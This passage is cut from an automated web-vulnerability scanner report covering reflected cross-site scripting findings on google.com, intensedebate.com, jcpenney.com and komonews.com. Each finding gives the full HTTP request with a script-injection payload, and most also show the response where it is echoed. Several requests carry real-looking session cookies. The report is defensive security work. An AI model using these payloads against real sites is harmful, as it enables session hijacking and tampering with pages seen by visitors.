The name of an arbitrarily supplied request parameter is copied into a JavaScript expression. The scanner classified the context as not encapsulated in any quotation marks; in the response shown below, however, the value lands inside a single-quoted string literal passed to google.History.initialize('/advanced_search?...'). The payload 3098c(a)9e795bf8852 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that the parameter name reaches script context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. Note that the = which followed the payload in the request has been rewritten as \x3d in the response, which indicates that the application hex-escapes at least some characters before placing data in this string; whether ', \, < and line terminators are escaped the same way should be checked manually before the finding is treated as exploitable. The X-XSS-Protection: 1; mode=block header in the response only engages the browser's reflected-XSS filter and is not a server-side fix.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advanced_search?3098c(a)9e795bf8852=1 HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: enabled=0; PREF=ID=b1572e52fc3cd4d5:U=bce7df5b3282f251:FF=4:LD=en:CR=2:TM=1297804539:LM=1298681654:GM=1:SG=1:S=-JanrRLI9rSxMcr6; NID=44=mcJxkrzXmczElElnaF5HocjNHmLNt4pvYRyvxjBgt1PNqwmpYxKB6kYZjqhCdWRZPIUGMXU6-O1SB_eTxLxXwWP03fWJ6TZXOH275z7fcKKbXQwKJPRVr195riQJN7Vo;

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 02:28:48 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=b1572e52fc3cd4d5:U=bce7df5b3282f251:FF=4:LD=en:CR=2:TM=1297804539:LM=1298687328:GM=1:SG=1:S=J5V_AC4Ha8s4IHpI; expires=Mon, 25-Feb-2013 02:28:48 GMT; path=/; domain=.google.com
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google Advanced Search</title><style id=gstyle>html{overflow-y:scroll}div,td,.n a,.n a:visited{color:#000}.ts td,.
...[SNIP]...
t()});
})();
;}catch(e){google.ml(e,false,{'cause':'defer'});}if(google.med) {google.med('init');google.initHistory();google.med('history');}google.History&&google.History.initialize('/advanced_search?3098c(a)9e795bf8852\x3d1')});if(google.j&&google.j.en&&google.j.xi){window.setTimeout(google.j.xi,0);}</script>
...[SNIP]...

1.396. http://www.google.com/search [tch parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.google.com
Path:   /search

Issue detail

The value of the tch request parameter is copied into a JavaScript expression. The scanner classified the context as not encapsulated in any quotation marks; the response body below was captured in a compressed form and is only partially readable, but the readable fragment shows the value inside an escaped string, with the surrounding & and = characters hex-escaped rather than literal. The payload d9639(a)a632ca10bea was submitted in the tch parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that the parameter value reaches script context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. The hex-escaping visible around the reflection suggests an output encoder is in place, so manual testing of ', \, < and line terminators is required before the finding is treated as exploitable; the X-XSS-Protection: 1; mode=block response header is a browser-side filter, not a fix.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search?sclient=psy&hl=en&safe=off&source=hp&q=240+813-1866&aq=f&aqi=&aql=&oq=&pbx=1&bav=on.1,or.&fp=19d8439716407a1a&tch=1d9639(a)a632ca10bea&ech=1&psi=169mTe-rNcOblgf54ciDAg12985753385413 HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=240+813+1866
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Avail-Dictionary: rU20-FBA
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: enabled=0; NID=44=pQ4eIjwCSm2WOoKbUXgYa4QUKflgqM23t_08vBWQgmL1yZwd-wLuzaKiui-FEVH4ZpBbB-kw1Gq_VLRJJ-qV-627aFk3mtmwP3kZiFcS9khxAw3WiUaQbqrikQfGpyhG; PREF=ID=b1572e52fc3cd4d5:U=bce7df5b3282f251:FF=4:LD=en:CR=2:TM=1297804539:LM=1298575319:GM=1:SG=1:S=yzQzg9fu_LrIwvaf

Response

HTTP/1.1 200 OK
Date: Thu, 24 Feb 2011 19:22:37 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=b1572e52fc3cd4d5:U=bce7df5b3282f251:FF=4:LD=en:CR=2:TM=1297804539:LM=1298575357:GM=1:SG=1:S=g4sVAXd3DV_qrKSx; expires=Sat, 23-Feb-2013 19:22:37 GMT; path=/; domain=.google.com
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 39819

f94-wCe9....S....o..}.....q......."<!doctype html><title>240 813-1866. F..5var je=parent.google.j;var _loc='#'+location.href.substr(location.href.indexOf('?')+1);var _ss=je.ss;var _jus='c9c918f0';if(j
...[SNIP]...
;source\\x3dhp\\x26amp;q\\x3d240+813-1866\\x26amp;aq\\x3df\\x26amp;aqi\\x3d\\x26amp;aql\\x3d\\x26amp;oq\\x3d\\x26amp;pbx\\x3d1\\x26amp;bav\\x3don.1,or.\\x26amp;fp\\x3d19d8439716407a1a\\x26amp;tch\\x3d1d9639(a)a632ca10bea\\x26amp;ech\\x3d1\\x26amp;psi\\x3d169mTe-rNcOblgf54ciDAg12985753385413\x27)});});r();var l\x3dSN...Q\x27#\x27)):\x27#\x27;if(l\x3d\x3d\x27#\x27\x26\x26google.defre){google.defre\x3dc,~.*\x26\x26google
...[SNIP]...

1.397. http://www.intensedebate.com/js/getCommentLink.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.intensedebate.com
Path:   /js/getCommentLink.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 184c3'><script>alert(1)</script>c5b963d468a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/getCommentLink.php184c3'><script>alert(1)</script>c5b963d468a HTTP/1.1
Host: www.intensedebate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 23 Feb 2011 22:12:09 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4807

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/js/getCommentLink.php184c3'><script>alert(1)</script>c5b963d468a'>
...[SNIP]...

1.398. http://www.intensedebate.com/js/getCommentLink.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.intensedebate.com
Path:   /js/getCommentLink.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fbf47'><script>alert(1)</script>ae51ac4036 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/getCommentLink.php/fbf47'><script>alert(1)</script>ae51ac4036 HTTP/1.1
Host: www.intensedebate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 23 Feb 2011 22:12:06 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4805

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/js/getCommentLink.php/fbf47'><script>alert(1)</script>ae51ac4036'>
...[SNIP]...

1.399. http://www.intensedebate.com/js/getCommentLink.php [postid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.intensedebate.com
Path:   /js/getCommentLink.php

Issue detail

The value of the postid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a45a9(a)8026e7e6978 was submitted in the postid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/getCommentLink.php?acct=742530b2bd340020fe6aa362ef3f908c&postid=a45a9(a)8026e7e6978&posturl=http://www.komonews.com/news/local/116755469.html HTTP/1.1
Host: www.intensedebate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 23 Feb 2011 22:12:16 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 3641

var IDHost = "http://www.intensedebate.com/";
var scripts = document.getElementsByTagName("script");
var parentObja45a9(a)8026e7e6978 = null;
var theObja45a9(a)8026e7e6978 = null;
var acct = '742530b2bd340020fe6aa362ef3f908c';
var thisdate = new Date();

function checkIna45a9(a)8026e7e6978()
{
   if(!newImage)
   {
       var newImage = docu
...[SNIP]...

1.400. http://www.jcpenney.com/jcp/getjcpheaderc.aspx [function parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.jcpenney.com
Path:   /jcp/getjcpheaderc.aspx

Issue detail

The value of the function request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 4f9b5%3balert(1)//8a09436e575 was submitted in the function parameter. This input was echoed as 4f9b5;alert(1)//8a09436e575 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jcp/getjcpheaderc.aspx?function=getmenuitems4f9b5%3balert(1)//8a09436e575&ver=20110225&fx=3 HTTP/1.1
Host: www.jcpenney.com
Proxy-Connection: keep-alive
Referer: http://www.jcpenney.com/jcp/default.aspx
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; AKJCP=CT-1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP="CAO DSP COR CURa DEVa PSAa IVAa OURa IND UNI NAV STA OTC"
Cache-Control: private
Expires: Sat, 26 Feb 2011 16:53:06 GMT
Content-Type: text/html; charset=utf-8
ntCoent-Length: 56
Date: Sat, 26 Feb 2011 04:53:06 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 56

Error function : getmenuitems4f9b5;alert(1)//8a09436e575

1.401. http://www.komonews.com/home/video/116474128.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /home/video/116474128.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60e08"><script>alert(1)</script>034151ed390 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home/video/116474128.html?60e08"><script>alert(1)</script>034151ed390=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u24-b14
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:15:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 52612


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Pizza work
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/home/video/116474128.html?60e08"><script>alert(1)</script>034151ed390=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.402. http://www.komonews.com/home/video/116545678.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /home/video/116545678.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e617"><script>alert(1)</script>b9f69a85e49 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home/video/116545678.html?8e617"><script>alert(1)</script>b9f69a85e49=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u24-b14
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:15:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 52532


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Popsicle b
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/home/video/116545678.html?8e617"><script>alert(1)</script>b9f69a85e49=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.403. http://www.komonews.com/home/video/116673784.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /home/video/116673784.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de53e"><script>alert(1)</script>dab5cd8a77e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home/video/116673784.html?de53e"><script>alert(1)</script>dab5cd8a77e=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u24-b7
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:15:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 52551


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Dog food d
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/home/video/116673784.html?de53e"><script>alert(1)</script>dab5cd8a77e=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.404. http://www.komonews.com/home/video/116675584.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /home/video/116675584.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de34b"><script>alert(1)</script>27421b48bf6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home/video/116675584.html?de34b"><script>alert(1)</script>27421b48bf6=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u24-b14
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:15:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 52557


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   All aboard
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/home/video/116675584.html?de34b"><script>alert(1)</script>27421b48bf6=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.405. http://www.komonews.com/home/video/116675749.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /home/video/116675749.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28363"><script>alert(1)</script>99e6cbbb627 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home/video/116675749.html?28363"><script>alert(1)</script>99e6cbbb627=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u24-b14
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:15:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 52472


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Cameras ca
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/home/video/116675749.html?28363"><script>alert(1)</script>99e6cbbb627=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.406. http://www.komonews.com/home/video/116702184.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /home/video/116702184.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0c0c"><script>alert(1)</script>f487fe8b3fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home/video/116702184.html?d0c0c"><script>alert(1)</script>f487fe8b3fa=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u7-b6
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:15:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 52498


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Eric's Lit
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/home/video/116702184.html?d0c0c"><script>alert(1)</script>f487fe8b3fa=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.407. http://www.komonews.com/news/116650859.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/116650859.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 396b3"><script>alert(1)</script>40d72bcd3cc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/116650859.html?396b3"><script>alert(1)</script>40d72bcd3cc=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u24-b14
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:14:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 59787


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Seattle co
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/116650859.html?396b3"><script>alert(1)</script>40d72bcd3cc=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.408. http://www.komonews.com/news/116650859.html [skipthumb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/116650859.html

Issue detail

The value of the skipthumb request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38c42"><script>alert(1)</script>c1b448bc43d was submitted in the skipthumb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/116650859.html?skipthumb=Y38c42"><script>alert(1)</script>c1b448bc43d HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u7-b6
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 59795


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Seattle co
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/116650859.html?skipthumb=Y38c42"><script>alert(1)</script>c1b448bc43d" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.409. http://www.komonews.com/news/116652534.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/116652534.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d385"><script>alert(1)</script>c66634aa9ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/116652534.html?7d385"><script>alert(1)</script>c66634aa9ad=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
